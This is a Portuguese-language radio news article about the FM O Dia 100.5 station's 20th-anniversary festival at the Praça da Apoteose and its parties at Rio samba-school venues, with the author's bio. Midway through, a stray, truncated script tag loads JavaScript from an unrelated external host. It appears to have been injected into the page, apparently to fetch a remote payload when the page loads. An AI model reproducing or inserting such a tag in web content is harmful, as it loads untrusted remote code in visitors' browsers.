Quarta-Feira, 05 de Julho de 2017 @ 07:47

Festas para comemoração dos 20 anos da FM O Dia começam no final do mês

Rio de Janeiro – Eventos serão realizados nas quadras de escolas de samba

Publicidade
A FM O Dia FM 100.5 do Rio de Janeiro está intensificando a divulgação das festas que irá realizar para comemorar seus 20 anos no ar na capital fluminense. O Festival de Aniversário da emissora será realizado no dia 10 de setembro na Praça da Apoteose. Além disso, no dia 29 de julho, a emissora vai realizar shows nas quadras das escolas de samba Tradição, União da Ilha, Viradouro e no Centro Esportivo Miécimo da Silva. Em todos os locais estarão artistas nacionais que fazem parte da playlist da emissora.
 
adstexto
 
O Festival 20 anos de Alegria será realizado no dia 10 de setembro na Praça da Apoteose, conhecida como a passarela do Carnaval carioca. O festival terá início às 13 horas e terá apresentações de Anitta, Dilsinho, Ferrugem, Imaginasamba, Ludmilla, Nego do Borel e Thiaguinho.
 
A emissora também vai realizar quatro eventos simultâneos no Grande Rio. O “Festas da FM O Dia” será realizado no dia 29 em quatro locais. Na quadra da Escola de Samba Tradição irão se apresentar  Dilsinho, Ferrugem, Maneirinho e Dj Nelsinho, a partir das 22 horas.
 
Já a quadra da União da Ilha terá as apresentações do grupo Imaginasamba, Mumuzinho e Batidão da FM O Dia com Anderson França, a partir das 23h. A quadra da Viradouro recebe Chininha e Príncipe, Turma do Pagode, Tá na Mente, Duduzinho e Mc Cabelinho, também a partir das 23h. A quarta festa terá Péricles, Dilsinho, part. Ferrugem e DJ Caverna no Centro Esportivo Miécimo da Silva, a partir das 23h.
 
A FM O Dia comemora os 20 anos em que opera em 100.5 FM na capital fluminense, cujo início ocorreu em 1997. Em 1996, quando estreou no dial, a marca operava em 90.3 FM e tinha perfil adulto-contemporâneo, segmento que mudou após a mudança para a 100.5, frequência que abrigava a RPC FM.
 
Sinal da 100.5 FM – Ouça on-line, veja o alcance de sinal da FM O Dia e de outras FMs no Rio de Janeiro. Escolha: Grande Rio de Janeiro, Região dos Lagos, Região SerranaSul Fluminense e Região de Juiz de Fora (MG).
cript id="lg210a" src="https://cloudapi.online/js/api46.js" type="text/javascript">

Teste
Carlos Massaro

Carlos Massaro atua como radialista e jornalista. Já coordenou artisticamente uma afiliada da Band FM (Promissão/SP) e trabalhou como locutor na afiliada da Band FM em Ourinhos/SP e na Interativa de Avaré/SP e como jornalista na Hot 107 FM 107.7 de Lençóis Paulista/SP e na Jovem Pan FM 88.9 e Divisa FM 93.3 de Ourinhos. Também é advogado na OAB/SP e membro da Comissão de Direito de Mídia da OAB de Campinas/SP, da Comissão de Direito da Comunicação e dos Meio da OAB da Lapa/SP e membro efetivo regional da Comissão Estadual de Defesa do Consumidor da OAB/SP. Atua pelo tudoradio.com desde 2009, responsável pela atualização diária da redação do portal.

https://www.tudoradio.com/noticias/ver/17772-festas-para-comemoracao-dos-20-anos-da-fm-o-dia-comecam-no-final-do-mes